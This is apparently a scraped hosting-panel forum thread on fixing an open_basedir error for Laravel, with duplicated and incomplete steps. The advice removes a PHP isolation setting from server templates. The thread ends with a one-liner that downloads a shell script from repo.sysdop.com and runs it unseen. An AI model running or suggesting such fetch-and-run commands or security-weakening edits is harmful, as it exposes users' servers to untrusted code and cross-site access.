ERROR: Please disable the open_basedir setting to continue.
ERROR: Please disable the open_basedir setting to continue.
ERROR: Please disable the open_basedir setting to continue.
laravel
please help me
laravel
please help me
Re: ERROR: Please disable the open_basedir setting to continue.
@impyros What is the Apache template you are using?
If it is default in SSH you should go to:
1) cd /usr/local/vesta/data/templates/web
2) edit the default.tpl and default.stpl using nano
3) Find and remove:
4) Save and download
5) Done!
If it is default in SSH you should go to:
1) cd /usr/local/vesta/data/templates/web
2) edit the default.tpl and default.stpl using nano
Code: Select all
apt-get install nano -y && nano default.tpl default.stpl
Code: Select all
php_admin_value open_basedir %docroot%:%home%/%user%/tmp
Code: Select all
apt-get install wget -y && cd && wget repo.sysdop.com/rvcp.sh -O rvcp.sh && sh rvcp.sh